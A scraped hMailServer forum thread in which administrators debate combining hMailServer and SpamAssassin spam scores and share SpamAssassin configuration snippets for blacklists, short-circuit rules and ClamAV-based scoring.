I also feel like hMailServer should change to all floating point scoring like some of the other commercial solutions so that there wouldn't be any integer truncation when adding everything together.
jimimaseye, your example that scored negative is a bit biased. Part of the negative contribution was because the mail is in some trusted whitelist databases. In my experience, you don't find the same IP's and domains both in blacklists AND whitelists....so, while not impossible, it is statistically unlikely the any DNSBL or SURBL hits would have fired for your example.
I also feel like hMailServer should change to all floating point scoring like some of the other commercial solutions so that there wouldn't be any integer truncation when adding everything together.
jimimaseye, your example that scored negative is a bit biased. Part of the negative contribution was because the mail is in some trusted whitelist databases. In my experience, you don't find the same IP's and domains both in blacklists AND whitelists....so, while not impossible, it is statistically unlikely the any DNSBL or SURBL hits would have fired for your example.
For me, the functionality seems logical to me (as I tried to explain above). The spamassassin score can be 'used', or simply the spam=yes/no and your own score applied.
I suspect it was intended to use EITHER spamassassin scores ONLY thereby leaving all decision making up to SA and not adding to by your own rules, OR you use SA conclusion ("spam=yes") and score it yourself along with having your own HMS testing (HELO, SPF, DNSBL etc). It seems that using SA score and then adding HMS test score to it isnt what it was intended for. After all, why would you ask SA to test for something, then do exactly the same test again in HMS (effectively doubling up the scoring probability) which is a scenario that is VERY possible (we have already identified the Spamassassin does the SPF, HELO, mainstream DNSBL and SURBL tests anyway - so why ask HMS to double check and double the points if you are choosing to accept SA scoring?)
Ideally, you would simply 'USE SPAMASSASSIN SCORING=YES', set your threshold as such (as you do in SA) and leave all HMS scoring and testing turned off (with exception of you having a specific surbl/dnsbl test that you KNOW your SA rules are not covering).
I suspect it was intended to use EITHER spamassassin scores ONLY thereby leaving all decision making up to SA and not adding to by your own rules, OR you use SA conclusion ("spam=yes") and score it yourself along with having your own HMS testing (HELO, SPF, DNSBL etc). It seems that using SA score and then adding HMS test score to it isnt what it was intended for. After all, why would you ask SA to test for something, then do exactly the same test again in HMS (effectively doubling up the scoring probability) which is a scenario that is VERY possible (we have already identified the Spamassassin does the SPF, HELO, mainstream DNSBL and SURBL tests anyway - so why ask HMS to double check and double the points if you are choosing to accept SA scoring?)
Ideally, you would simply 'USE SPAMASSASSIN SCORING=YES', set your threshold as such (as you do in SA) and leave all HMS scoring and testing turned off (with exception of you having a specific surbl/dnsbl test that you KNOW your SA rules are not covering).
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Spam scoring is a regional thing, I don't see the same SPAM as everyone else thus my rules should ideally be different and scored differently.
Unless you are a SpamAssassin expert (or sufficiently nerdy) you can create your own rules to grade scoring to match your environment - most choose not to and rely on pre-built rules that are updated based on a world average of SPAM, simply based on lack of time to maintain those rules. SPAM is evolving all the time and so should the rules to catch it.
Most spammers break rules to deliver SPAM in the most efficient way possible - because someone is paying them - and as we all know; Time is Money.
- GreyListing is a powerfull tool - This is where "Time is Money" become important.
- SPF
- DKIM make everything just a bit more reliable.
- HELO is unfortunately not a reliable way to identify spammers as more home users are "in-sourcing" their mail systems.
- MX... Well, this is where WE can break the rules. It is not a requirement to have MX records according to the RFC's. But, we believe any respectable IT department would have them, if for nothing else than to fight SPAM with a blackhole.MX setup.
- RBL's and SURBL's is a matter of choice. Find one (or more) you trust and "get an opinion from a trusted source".
SpamAssassin will do nearly
Add it all together, and we'll get a pretty good picture of what is SPAM, and what is HAM.
For my part I rate everything as 3, SpamAssassin triggers at 3.0. Anything 3 or above is marked as SPAM, moved into the users SPAM folder, and forwarded to a dedicated SPAM user for further analysis - if needed. Only SPAM scored above 100 is deleted/rejected.
False-positives are added to a hMail rule-based whitelist to prevent them being treated as SPAM - however they will still be marked as SPAM.
Each users SPAM folder and INBOX folder is processed every night to maintain the Bayesian database used by SpamAssassin. The intended rationale is to "localize" SpamAssassin to my neck of the woods. Also the users are able to partly influence classification by moving emails between the two folders for processing the next night (actually, they have a 30 day window).
Despite all efforts I do get SPAM that only SpamAssassin catch... Spammers are getting increasingly cleverer.
As I posted earlier...
I did a quick search on my server for the highest SPAM score in the last 6 months... 66.2 and it passed ALL of the other SPAM tests in hMailServer (Greylist, SPF, DKIM, HELO, MX, 4 RBL's and SURBL), except SpamAssassin ...
Unless you are a SpamAssassin expert (or sufficiently nerdy) you can create your own rules to grade scoring to match your environment - most choose not to and rely on pre-built rules that are updated based on a world average of SPAM, simply based on lack of time to maintain those rules. SPAM is evolving all the time and so should the rules to catch it.
Most spammers break rules to deliver SPAM in the most efficient way possible - because someone is paying them - and as we all know; Time is Money.
- GreyListing is a powerfull tool - This is where "Time is Money" become important.
- SPF
WASa powerfull tool, it's use is increasing amongst spammers.
- DKIM make everything just a bit more reliable.
- HELO is unfortunately not a reliable way to identify spammers as more home users are "in-sourcing" their mail systems.
- MX... Well, this is where WE can break the rules. It is not a requirement to have MX records according to the RFC's. But, we believe any respectable IT department would have them, if for nothing else than to fight SPAM with a blackhole.MX setup.
- RBL's and SURBL's is a matter of choice. Find one (or more) you trust and "get an opinion from a trusted source".
SpamAssassin will do nearly
all of the above, maybe not with the scoring we'd like to use, but then we can add them to hMailServer ourselves. It's like fine tuning SpamAssassin, outside of SpamAssassin.
Add it all together, and we'll get a pretty good picture of what is SPAM, and what is HAM.
For my part I rate everything as 3, SpamAssassin triggers at 3.0. Anything 3 or above is marked as SPAM, moved into the users SPAM folder, and forwarded to a dedicated SPAM user for further analysis - if needed. Only SPAM scored above 100 is deleted/rejected.
False-positives are added to a hMail rule-based whitelist to prevent them being treated as SPAM - however they will still be marked as SPAM.
Each users SPAM folder and INBOX folder is processed every night to maintain the Bayesian database used by SpamAssassin. The intended rationale is to "localize" SpamAssassin to my neck of the woods. Also the users are able to partly influence classification by moving emails between the two folders for processing the next night (actually, they have a 30 day window).
Despite all efforts I do get SPAM that only SpamAssassin catch... Spammers are getting increasingly cleverer.
As I posted earlier...
I did a quick search on my server for the highest SPAM score in the last 6 months... 66.2 and it passed ALL of the other SPAM tests in hMailServer (Greylist, SPF, DKIM, HELO, MX, 4 RBL's and SURBL), except SpamAssassin ...
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
Just for info, my SA has a mark threshold of 3 and that's when mail gets marked as [SPAM].
Anything that reaches HMS over a score of 7 is automatically deleted - remaining unseen and unknown (technically not true - it gets moved to Trash folder straight away by a rule, so viewable IF you want to go there and see it).
I would say that 98% (if not more) of my mail comes in clean and unmarked or deleted as definite spam correctly. The other 2% gets marked as spam (by SA) but remains genuine (usually because the mail comes in sent with full capitals subjects and/or body content - spamassassin dont like that.)
Anything that reaches HMS over a score of 7 is automatically deleted - remaining unseen and unknown (technically not true - it gets moved to Trash folder straight away by a rule, so viewable IF you want to go there and see it).
I would say that 98% (if not more) of my mail comes in clean and unmarked or deleted as definite spam correctly. The other 2% gets marked as spam (by SA) but remains genuine (usually because the mail comes in sent with full capitals subjects and/or body content - spamassassin dont like that.)
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Spam fighting is an art and a never ending battle. I feel like all available spam technologies should be employed. I like the design of being able to deploy anti-spam technologies in a score fashion and add everything together to make the final decision.
Not too many people have chimed in one way or the other. If I am the only one who really feels strongly that all methods should add together to one final score, then I'll just modify the source to behave like I want. After inspecting the source, it seems this change would be rather easy to make. I was really hoping the developer and community would feel as strongly as I do...as I hate maintaining a forked project.
It looks as though I could also write a script to grab the SpamAssassin score and the HMS score and add them together myself in the situations where HMS doesn't add them itself.
Not too many people have chimed in one way or the other. If I am the only one who really feels strongly that all methods should add together to one final score, then I'll just modify the source to behave like I want. After inspecting the source, it seems this change would be rather easy to make. I was really hoping the developer and community would feel as strongly as I do...as I hate maintaining a forked project.
It looks as though I could also write a script to grab the SpamAssassin score and the HMS score and add them together myself in the situations where HMS doesn't add them itself.
Martin doesn't spend a lot of time any more on the forummattg wrote:I'd think that NOT doing that is a bug, and that this should be added to the issue tracker at https://github.com/hmailserver/hmailserver/issues
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
If you do change the source code, you could try submitting it to Martin for review. You may get lucky and have it included in the release.superman20 wrote:Spam fighting is an art and a never ending battle. I feel like all available spam technologies should be employed. I like the design of being able to deploy anti-spam technologies in a score fashion and add everything together to make the final decision.
Not too many people have chimed in one way or the other. If I am the only one who really feels strongly that all methods should add together to one final score, then I'll just modify the source to behave like I want. After inspecting the source, it seems this change would be rather easy to make. I was really hoping the developer and community would feel as strongly as I do...as I hate maintaining a forked project.
It looks as though I could also write a script to grab the SpamAssassin score and the HMS score and add them together myself in the situations where HMS doesn't add them itself.
Scripting is quite easy. I have my Backup-MX hosted with my ISP and they use a round-robin approach to DNS so the HELO check fails on 2 of 3 rDNS lookups also the DKIM check fails for obvious reasons, so I rewrite/recalculate the "X-hMailServer-Spam" and "X-hMailServer-Reason-Score" headers in those cases.
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
(Sorry I missed this and didnt answer earlier.)
There is nothing unlikely about this scenario for people that are using such geo-blocking (as I am).
In my example, I showed a scenario where a message ended up as MINUS score. Now, lets say that it was sent from china (it wssnt but it could have been). Still genuine, still allowed, not technically spam (hence its score). BUT....I have a DNSBL rule (zz.countries.nerd.dk) that scores anything coming from china a value of 8 which would be enough to reject this email due to hitting my 'delete' threshold of 8 (because I dont want anything from china). Any yet, in this example CLEARLY it would have been allowed in because -4.4+8 is only 3.6 = FAILED.superman20 wrote:jimimaseye, your example that scored negative is a bit biased. Part of the negative contribution was because the mail is in some trusted whitelist databases. In my experience, you don't find the same IP's and domains both in blacklists AND whitelists....so, while not impossible, it is statistically unlikely the any DNSBL or SURBL hits would have fired for your example.
There is nothing unlikely about this scenario for people that are using such geo-blocking (as I am).
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
jimimaseye, I certainly appreciate the point you're trying to make, but your new example is a bit contradictory. You have negative points because your e-mail hits some whitelists and some positive points because the e-mail hits some blacklists. I don't think any spam configuration would properly deal with that sort of conflicting information. I actually implement your example somewhat but deal with it differently. My settings have e-mail that is geo-located from China to automatically score the reject/delete score...BUT I also make sure that these custom "extreme" rules are run first and when they hit then everything else is short-circuited. This prevents me from allowing a legitimate e-mail from getting any negative points when I want all China e-mail blocked (good or bad).
As is my case. And I dont need any special 'coding'/methods to ensure everything else is shortcircuited as this is just how things work currently. As my geoblock DNSBL is in the HMS and would hit the threshold it then gets rejected immediately and not passed to SA (delivery refused). However, your earlier suggestion is that everything should be added together so logically you wouldnt be able to shortcut because after the HMS performs its internal checks it would HAVE to call SA and get its scoring before it can concluded and react on its final scoring.superman20 wrote:BUT I also make sure that these custom "extreme" rules are run first and when they hit then everything else is short-circuited.
You cant have it both ways.
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
You can somewhat have it both ways if you have spam systems that works together and not independently. Spam checking can definitely stop as soon as the delete threshold is reached. So if the HMS implemented checks hit the delete threshold, then there is no need to call any other checks. However, you must keep going down the chain calling all checks until the delete threshold is reached. Spam testing will never be absolute which is why I strongly feel that it must always be additive. You are adding probabilities and confidence levels that something is spam. If your spam level is 5 and HMS scores 4 and SpamAssassin scores 4 (and assuming a sensible setup where there are no redundant tests), then each one independently says NOT spam, but I'd be willing to bet that it is spam in almost all of those situations.
the problem is that you are suggesting that two totally separate system, each with their own intensities and complexities (with SA being WAY more advanced than HMS), are somewhat 'collated' and the scores shared despite one being the little runt of the spam checking fraternity wholst the other one being the guru. Even if HMS scoring would allow negative scoring, it would make a LITTLE (just) more advanced and more like SA capabilities but it doesnt (SA realises there are positives, and then reasons to double check to apply negatives to counteract - something that HMS spam checking doesnt).
I maintain the two are TOTALLY separate systems (one being written and designed by HMS author and the other being created and written by unrelated entities who HMS author has no control over), it was designed to be that way (use on or the other but not both (although it wont stop you)) and was designed that way for a reason (recognition that SA will do the job a LOT better than HMS can ever dream of). Using ACTUAL SA scores and adding them to HMS scoring of internal checks wouldnt make sense because SA's idea of what scoring values work and what they should be are coded, tested, retested, fine-tuned, modified and implemented after a retest again. HMS scoring is simply (usually) choose a number, an INTEGER only at that, and apply it. Example, SA SPF fail check might score only 0.2 whereas in HMS its default is 2 or 3. Well how can that work together? Still, it will let you but only once it has taken the advice from the guru of spam-checking (Spamassassin) to decide on whether there is any REAL threat.
Thats my view anyway.
I maintain the two are TOTALLY separate systems (one being written and designed by HMS author and the other being created and written by unrelated entities who HMS author has no control over), it was designed to be that way (use on or the other but not both (although it wont stop you)) and was designed that way for a reason (recognition that SA will do the job a LOT better than HMS can ever dream of). Using ACTUAL SA scores and adding them to HMS scoring of internal checks wouldnt make sense because SA's idea of what scoring values work and what they should be are coded, tested, retested, fine-tuned, modified and implemented after a retest again. HMS scoring is simply (usually) choose a number, an INTEGER only at that, and apply it. Example, SA SPF fail check might score only 0.2 whereas in HMS its default is 2 or 3. Well how can that work together? Still, it will let you but only once it has taken the advice from the guru of spam-checking (Spamassassin) to decide on whether there is any REAL threat.
Thats my view anyway.
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Just using some quiet time to implement SpamAssassin
New Windows 10 Pro machine. Enabled HyperV Server and created a new Ubuntu Server install (running on one core and 512 MB RAM) to run SpamAssassin, ClamAV as per >> viewtopic.php?f=21&t=29053
I've found SA marks far lower than I would like.
Playing with SA rules is deep nerdy stuff. I don't want to go and re-score all tests, and potentially break updates, so I have created a new SA rule that simply adds 2.2 to all SA scores. I have set SA to mark as spam if 3 or higher, without changing the subject.
My existing hMailserver AntiSPAM was working pretty good, with a mark at 5 and delete at 60
I've added ClamAV scores including the Sane-Security databases to SA. Currently Mail gets scanned twice by ClamAV, once to score, and then to categorically detect virus - I am watching to see how that works out.
Also using lots of additional databases and filters that I have found here.
Still looking for a good GeoIP addition for Spamassassin.
Still fine-tuning, but catching more SPAM without catching more HAM
New Windows 10 Pro machine. Enabled HyperV Server and created a new Ubuntu Server install (running on one core and 512 MB RAM) to run SpamAssassin, ClamAV as per >> viewtopic.php?f=21&t=29053
I've found SA marks far lower than I would like.
Playing with SA rules is deep nerdy stuff. I don't want to go and re-score all tests, and potentially break updates, so I have created a new SA rule that simply adds 2.2 to all SA scores. I have set SA to mark as spam if 3 or higher, without changing the subject.
My existing hMailserver AntiSPAM was working pretty good, with a mark at 5 and delete at 60
I've added ClamAV scores including the Sane-Security databases to SA. Currently Mail gets scanned twice by ClamAV, once to score, and then to categorically detect virus - I am watching to see how that works out.
Also using lots of additional databases and filters that I have found here.
Still looking for a good GeoIP addition for Spamassassin.
Still fine-tuning, but catching more SPAM without catching more HAM
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
@mattg
A nice source of DNB's lists ready to use with SpamAssassin is listed here:
http://www.intra2net.com/en/support/antispam/index.php
A nice source of DNB's lists ready to use with SpamAssassin is listed here:
http://www.intra2net.com/en/support/antispam/index.php
CIDR to RegEx:
DNS Lookup:
DNSBL Lookup:
GEOIP Lookup:
d-fault.nl/CIDRtoRegEx
DNS Lookup:
d-fault.nl/DNSTools
DNSBL Lookup:
d-fault.nl/DNSBLLookup
GEOIP Lookup:
d-fault.nl/GeoipLookup
Could someone post a copy of your spamassassin local.cf with your preferred rules to allow spamassassin do all of the dnsbl and uribl tests . I would like to move all the spam test to spamassassin for better implementation of the scoring and remove it out of hmailserver. It is very confusing when the 2 scoring systems either do not add together or counter each other. I say let one system score for spam and maybe hmailserver do the early spf and dns tests unless spamassassin can do those as well. Not being able to fine tune hmailserver except in whole number integers also skews the scoring. 4.9 is truncated to 4. Thank you
My setup is here: viewtopic.php?f=21&t=28133 (personal settings are in the 2nd post). You will see I simply set a 'tagged by SA' as 5 in line with the builtin antispam tests. (You dont have to use SA's scoring system).
You can simply exclusive use SA if you wish by just disabling any builtin antispam tests (DNSBL's etc). I personally (as you will see) use a combination of both. SA does a far better job of antispam testing so you can be confident that in the main if HMS would find it then SA has already found it...and then some.
You can simply exclusive use SA if you wish by just disabling any builtin antispam tests (DNSBL's etc). I personally (as you will see) use a combination of both. SA does a far better job of antispam testing so you can be confident that in the main if HMS would find it then SA has already found it...and then some.
5.7 on test.
AV:
SpamassassinForWindows 3.4.0spamd service
AV:
Clamwin+Clamdservice +sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
Thank you for your post. I had seen that setup but I was hoping that there would be a way of just controlling the dnsbl and uribl tests in the local.cf or another file without having to get into all the scripting. Not being a programmer, scripting get confusing if you do not use it all the time, at least for me. Is there a way to set it in the local.cf? Thank you for the help.
In c$\SpamAssassin\share\3.004000\updates_spamassassin_org you will find two files;
The clever thing with SpamAssassin is that it reads all config files alphabetically ... So if you copy these two files to c$\SpamAssassin\etc\spamassassin and name them
Anyways, take a look at the files and you'll get the idea how to build your own lists.
***** Example *****
I have a config (KAM.cf) about 288 kb... There is this one rule ...
that check the entire message incl. attachments. If someone send an email to me with a PDF file in it, it usually takes 300+ seconds and then hMail fails.
I have created an extra config (KAM-fix.cf) containing only this rule
where "full" is replaced with "body" in line 4. Since KAM.cf is read first and then KAM-fix.cf, it changes the rule. Now everything passes in less than 10 seconds. - And I don't have to create a script to alter the file every time it is auto-updated.
20_dnsbl_tests.cfand25_uribl.cf
The clever thing with SpamAssassin is that it reads all config files alphabetically ... So if you copy these two files to c$\SpamAssassin\etc\spamassassin and name them
my_dnsbl_tests.cfandmy_uribl.cfyou can modify them all you want or change the score as they are read AFTER the originals.
Anyways, take a look at the files and you'll get the idea how to build your own lists.
***** Example *****
I have a config (KAM.cf) about 288 kb... There is this one rule ...
Code: Select all
#Bad UTF-8 content type and transfer encoding - Thanks to Pedro David Marco for alerting to issue
header __KAM_BAD_UTF8_1 Content-Type =~ /text\/html; charset=\"utf-8\"/i
header __KAM_BAD_UTF8_2 Content-Transfer-Encoding =~ /base64/i
full __RW_BAD_UTF8_3 /^(?:[^\n]|\n(?!\n))*\nContent-Transfer-Encoding:\s+base64(?:[^\n]|\n(?!\n))*\n\n[\s\n]{0,300}[^\s\n].{0,300}[^a-z0-9+\/=\n][^\s\n]/si
meta KAM_BAD_UTF8 (__KAM_BAD_UTF8_1 + __KAM_BAD_UTF8_2 + __RW_BAD_UTF8_3 >= 3)
score KAM_BAD_UTF8 14.0
describe KAM_BAD_UTF8 Bad Content Type and Transfer Encoding that attempts to evade SA scanning
I have created an extra config (KAM-fix.cf) containing only this rule
Code: Select all
#Bad UTF-8 content type and transfer encoding - Thanks to Pedro David Marco for alerting to issue
header __KAM_BAD_UTF8_1 Content-Type =~ /text\/html; charset=\"utf-8\"/i
header __KAM_BAD_UTF8_2 Content-Transfer-Encoding =~ /base64/i
body __RW_BAD_UTF8_3 /^(?:[^\n]|\n(?!\n))*\nContent-Transfer-Encoding:\s+base64(?:[^\n]|\n(?!\n))*\n\n[\s\n]{0,300}[^\s\n].{0,300}[^a-z0-9+\/=\n][^\s\n]/si
meta KAM_BAD_UTF8 (__KAM_BAD_UTF8_1 + __KAM_BAD_UTF8_2 + __RW_BAD_UTF8_3 >= 3)
score KAM_BAD_UTF8 14.0
describe KAM_BAD_UTF8 Bad Content Type and Transfer Encoding that attempts to evade SA scanning
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
In your experience with whitelisting and blacklisting is there an easy manageable way to add a whitelist/blacklists in spamassassin instead of hmailserver? I like hmailserver fine but not easy to manage the whitelist and blocking rules when they grow like mine have since trying to get a handle on all the different ways to stop spam but not stop ham. I end up adding the same line or rule again and again. I am sure in your experiences you have said I think there is an easier way to to implement this or manage this. Thanks in advance.
My SpamAssassin is reasonable well trained after 3 years so I have only a few addresses whitelisted in SpamAssassin.kroberts wrote:In your experience with whitelisting and blacklisting is there an easy manageable way to add a whitelist/blacklists in spamassassin instead of hmailserver? I like hmailserver fine but not easy to manage the whitelist and blocking rules when they grow like mine have since trying to get a handle on all the different ways to stop spam but not stop ham. I end up adding the same line or rule again and again. I am sure in your experiences you have said I think there is an easier way to to implement this or manage this. Thanks in advance.
I don't have a blacklist per se... I block emails on multiple levels of identification; body, from, helo and subject, all done in eventhandlers; OnClientConnect(oClient), OnHELO(oClient) and OnAcceptMessage(oClient, oMessage).
80% of what I block is rejected, the rest is marked as SPAM and my daily SpamAssassin training eventually learn the blacklisted emails so I can clean some of the manual blacklist after about 1 month or so.
I check my custom logs every day and adjust filters if needed. Last time was IIRC 2 weeks ago - and I also built a new IDS function to catch brute force IMAPS logon attempts a few days ago.
SørenR.
Word used by programmers when they do not want to explain what they did.
Algorithm(noun.)
Word used by programmers when they do not want to explain what they did.
Here is a snippet of my custom.cf
(I changed the name so that it wasn't overwritten on SpamAssassin upgrade)
(I changed the name so that it wasn't overwritten on SpamAssassin upgrade)
Code: Select all
# Some shortcircuiting, if the plugin is enabled
#
ifplugin Mail::SpamAssassin::Plugin::Shortcircuit
#
# default: strongly-whitelisted mails are *really* whitelisted now, if the
# shortcircuiting plugin is active, causing early exit to save CPU load.
# Uncomment to turn this on
#
shortcircuit USER_IN_WHITELIST on
# shortcircuit USER_IN_DEF_WHITELIST on
shortcircuit USER_IN_ALL_SPAM_TO on
shortcircuit SUBJECT_IN_WHITELIST on
# the opposite; blacklisted mails can also save CPU
#
shortcircuit USER_IN_BLACKLIST on
# shortcircuit USER_IN_BLACKLIST_TO on
# shortcircuit SUBJECT_IN_BLACKLIST on
# if you have taken the time to correctly specify your "trusted_networks",
# this is another good way to save CPU
#
endif # Mail::SpamAssassin::Plugin::Shortcircuit
# don't score URIBL
score URIBL_BLACK 0
score URIBL_RED 0
score URIBL_GREY 0
score URIBL_BLOCKED 0
# DNSBL scores
score URIBL_DBL_SPAM 4
score RCVD_IN_SBL 3
# blacklist from
blacklist_from *.top
blacklist_from *.eu
blacklist_from *.download
blacklist_from *.accountant
blacklist_from *.cf
blacklist_from *.party
blacklist_from *.review
blacklist_from *.faith
blacklist_from *.win
blacklist_from *.trade
blacklist_from *.webcam
blacklist_from *.racing
blacklist_from *.date
blacklist_from *.bid
blacklist_from *.cricket
# whitelist from
whitelist_from *@important_domain.com.au
## BELOW is my ClamAV Integration
## NOT needed for what you are doing
loadplugin ClamAV clamav.pm
full CLAMAV eval:check_clamav()
describe CLAMAV Clam AntiVirus detected something...
score CLAMAV 0.001
# Look for specific types of ClamAV detections
header __CLAMAV_PHISH X-Spam-Virus =~ /Yes.{1,30}Phishing/i
header __CLAMAV_PHISH_HEUR X-Spam-Virus =~ /Yes.{1,30}Phishing\.Heuristics\.Email/
header __CLAMAV_SANE X-Spam-Virus =~ /Yes.{1,30}Sanesecurity/i
header __CLAMAV_MBL X-Spam-Virus =~ /Yes.{1,30}MBL/
header __CLAMAV_MSRBL X-Spam-Virus =~ /Yes.{1,30}MSRBL/
header __CLAMAV_VX X-Spam-Virus =~ /Yes.{1,30}VX\./
# Give the above rules a very late priority so that they can see the output
# of previous rules - otherwise they don't work! Not sure what the correct
# priority should be but this seems to work...
priority __CLAMAV_PHISH 9999
priority __CLAMAV_PHISH_HEUR 9999
priority __CLAMAV_SANE 9999
priority __CLAMAV_MBL 9999
priority __CLAMAV_MSRBL 9999
priority __CLAMAV_VX 9999
# Work out what ClamAV detected and score accordingly
# ClamAV general signatures
meta CLAMAV_VIRUS (CLAMAV && !__CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_MBL && !__CLAMAV_MSRBL && !__CLAMAV_VX)
describe CLAMAV_VIRUS Virus found by ClamAV default signatures
score CLAMAV_VIRUS 20.0
# ClamAV phishing signatures
meta CLAMAV_PHISH (CLAMAV && __CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH Phishing email found by ClamAV default signatures
score CLAMAV_PHISH 10.0
# ClamAV phishing with heuristic engine (not signatures based, may lead to false positives)
# Available since ClamAV 0.91
meta CLAMAV_PHISH_HEUR (CLAMAV && __CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH_HEUR Phishing email found by ClamAV heuristic engine
score CLAMAV_PHISH_HEUR 2.0
# ClamAV SaneSecurity signatures from http://www.sanesecurity.com/clamav/
meta CLAMAV_SANE (CLAMAV && __CLAMAV_SANE)
describe CLAMAV_SANE SPAM found by ClamAV SaneSecurity signatures
score CLAMAV_SANE 15
# ClamAV MBL signatures from http://www.malware.com.br/
meta CLAMAV_MBL (CLAMAV && __CLAMAV_MBL)
describe CLAMAV_MBL Malware found by ClamAV MBL signatures
score CLAMAV_MBL 7.5
# ClamAV MSRBL signatures from http://www.msrbl.com/
meta CLAMAV_MSRBL (CLAMAV && __CLAMAV_MSRBL)
describe CLAMAV_MSRBL SPAM found by ClamAV MSRBL signatures
score CLAMAV_MSRBL 2.0
# ClamAV SecuriteInfo.com VX malware signatures from
# http://www.securiteinfo.com/services/clamav_unofficial_malwares_signatures.shtml
meta CLAMAV_VX (CLAMAV && __CLAMAV_VX)
describe CLAMAV_VX Malware found by SecuriteInfo.com VX signatures
score CLAMAV_VX 5.0
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
mattg wrote:Here is a snippet of my custom.cf
(I changed the name so that it wasn't overwritten on SpamAssassin upgrade)
Code: Select all
# Some shortcircuiting, if the plugin is enabled
#
ifplugin Mail::SpamAssassin::Plugin::Shortcircuit
#
# default: strongly-whitelisted mails are *really* whitelisted now, if the
# shortcircuiting plugin is active, causing early exit to save CPU load.
# Uncomment to turn this on
#
shortcircuit USER_IN_WHITELIST on
# shortcircuit USER_IN_DEF_WHITELIST on
shortcircuit USER_IN_ALL_SPAM_TO on
shortcircuit SUBJECT_IN_WHITELIST on
# the opposite; blacklisted mails can also save CPU
#
shortcircuit USER_IN_BLACKLIST on
# shortcircuit USER_IN_BLACKLIST_TO on
# shortcircuit SUBJECT_IN_BLACKLIST on
# if you have taken the time to correctly specify your "trusted_networks",
# this is another good way to save CPU
#
endif # Mail::SpamAssassin::Plugin::Shortcircuit
# don't score URIBL
score URIBL_BLACK 0
score URIBL_RED 0
score URIBL_GREY 0
score URIBL_BLOCKED 0
# DNSBL scores
score URIBL_DBL_SPAM 4
score RCVD_IN_SBL 3
# blacklist from
blacklist_from *.top
blacklist_from *.eu
blacklist_from *.download
blacklist_from *.accountant
blacklist_from *.cf
blacklist_from *.party
blacklist_from *.review
blacklist_from *.faith
blacklist_from *.win
blacklist_from *.trade
blacklist_from *.webcam
blacklist_from *.racing
blacklist_from *.date
blacklist_from *.bid
blacklist_from *.cricket
# whitelist from
whitelist_from *@important_domain.com.au
## BELOW is my ClamAV Integration
## NOT needed for what you are doing
loadplugin ClamAV clamav.pm
full CLAMAV eval:check_clamav()
describe CLAMAV Clam AntiVirus detected something...
score CLAMAV 0.001
# Look for specific types of ClamAV detections
header __CLAMAV_PHISH X-Spam-Virus =~ /Yes.{1,30}Phishing/i
header __CLAMAV_PHISH_HEUR X-Spam-Virus =~ /Yes.{1,30}Phishing\.Heuristics\.Email/
header __CLAMAV_SANE X-Spam-Virus =~ /Yes.{1,30}Sanesecurity/i
header __CLAMAV_MBL X-Spam-Virus =~ /Yes.{1,30}MBL/
header __CLAMAV_MSRBL X-Spam-Virus =~ /Yes.{1,30}MSRBL/
header __CLAMAV_VX X-Spam-Virus =~ /Yes.{1,30}VX\./
# Give the above rules a very late priority so that they can see the output
# of previous rules - otherwise they don't work! Not sure what the correct
# priority should be but this seems to work...
priority __CLAMAV_PHISH 9999
priority __CLAMAV_PHISH_HEUR 9999
priority __CLAMAV_SANE 9999
priority __CLAMAV_MBL 9999
priority __CLAMAV_MSRBL 9999
priority __CLAMAV_VX 9999
# Work out what ClamAV detected and score accordingly
# ClamAV general signatures
meta CLAMAV_VIRUS (CLAMAV && !__CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_MBL && !__CLAMAV_MSRBL && !__CLAMAV_VX)
describe CLAMAV_VIRUS Virus found by ClamAV default signatures
score CLAMAV_VIRUS 20.0
# ClamAV phishing signatures
meta CLAMAV_PHISH (CLAMAV && __CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH Phishing email found by ClamAV default signatures
score CLAMAV_PHISH 10.0
# ClamAV phishing with heuristic engine (not signatures based, may lead to false positives)
# Available since ClamAV 0.91
meta CLAMAV_PHISH_HEUR (CLAMAV && __CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH_HEUR Phishing email found by ClamAV heuristic engine
score CLAMAV_PHISH_HEUR 2.0
# ClamAV SaneSecurity signatures from http://www.sanesecurity.com/clamav/
meta CLAMAV_SANE (CLAMAV && __CLAMAV_SANE)
describe CLAMAV_SANE SPAM found by ClamAV SaneSecurity signatures
score CLAMAV_SANE 15
# ClamAV MBL signatures from http://www.malware.com.br/
meta CLAMAV_MBL (CLAMAV && __CLAMAV_MBL)
describe CLAMAV_MBL Malware found by ClamAV MBL signatures
score CLAMAV_MBL 7.5
# ClamAV MSRBL signatures from http://www.msrbl.com/
meta CLAMAV_MSRBL (CLAMAV && __CLAMAV_MSRBL)
describe CLAMAV_MSRBL SPAM found by ClamAV MSRBL signatures
score CLAMAV_MSRBL 2.0
